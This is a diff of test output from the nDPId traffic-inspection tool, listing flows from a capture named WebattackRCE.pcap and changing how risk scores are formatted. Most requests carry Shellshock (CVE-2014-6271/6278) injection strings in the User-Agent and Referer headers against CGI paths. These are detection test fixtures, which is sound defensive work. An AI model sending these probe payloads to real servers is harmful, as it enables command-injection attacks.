 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1576420277412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"ts_msec":1576420277412,"pkt":"AAAAAAAAAAAAAAAACABFAAEOAyBAAEAGOMh\/AAABfwAAAcUwH5BOyzvYEAppQYAYAED\/AgAAAQEICp1m\/cydZv3MR0VUIC9ndWVzdGJvb2suY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1576420277414,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"ts_msec":1576420277414,"pkt":"AAAAAAAAAAAAAAAACABFAAENCPdAAEAGMvJ\/AAABfwAAAcUyH5A4wTA94El3uoAYAED\/AQAAAQEICp1m\/c6dZv3OR0VUIC9oZWxwZGVzay5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/helpdesk.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/helpdesk.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1576420277416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"ts_msec":1576420277416,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgptAAEAGuVB\/AAABfwAAAcU0H5CIJLpUcW+qJoAYAED+\/gAAAQEICp1m\/dCdZv3QR0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1576420277417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"ts_msec":1576420277417,"pkt":"AAAAAAAAAAAAAAAACABFAAEKMxlAAEAGCNN\/AAABfwAAAcU2H5CRJgvewUykPIAYAED+\/gAAAQEICp1m\/dGdZv3RR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1576420277419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"ts_msec":1576420277419,"pkt":"AAAAAAAAAAAAAAAACABFAAEJrmtAAEAGjYF\/AAABfwAAAcU4H5CXuZakZnwUBoAYAED+\/QAAAQEICp1m\/dOdZv3TR0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1576420277420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"ts_msec":1576420277420,"pkt":"AAAAAAAAAAAAAAAACABFAAEJZRVAAEAG1td\/AAABfwAAAcU6H5C6AV3ZPf\/xToAYAED+\/QAAAQEICp1m\/dSdZv3UR0VUIC9pbmZvLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1576420277422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"ts_msec":1576420277422,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0gtAAEAGaeJ\/AAABfwAAAcU8H5DcN+rDzEDc2oAYAED+\/AAAAQEICp1m\/dadZv3WR0VUIC9pbmZvLnNoIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="}
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1576420277423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"ts_msec":1576420277423,"pkt":"AAAAAAAAAAAAAAAACABFAAENVqhAAEAG5UB\/AAABfwAAAcU+H5CeOW5utt+cAoAYAED\/AQAAAQEICp1m\/dedZv3XR0VUIC9sb2FkcGFnZS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
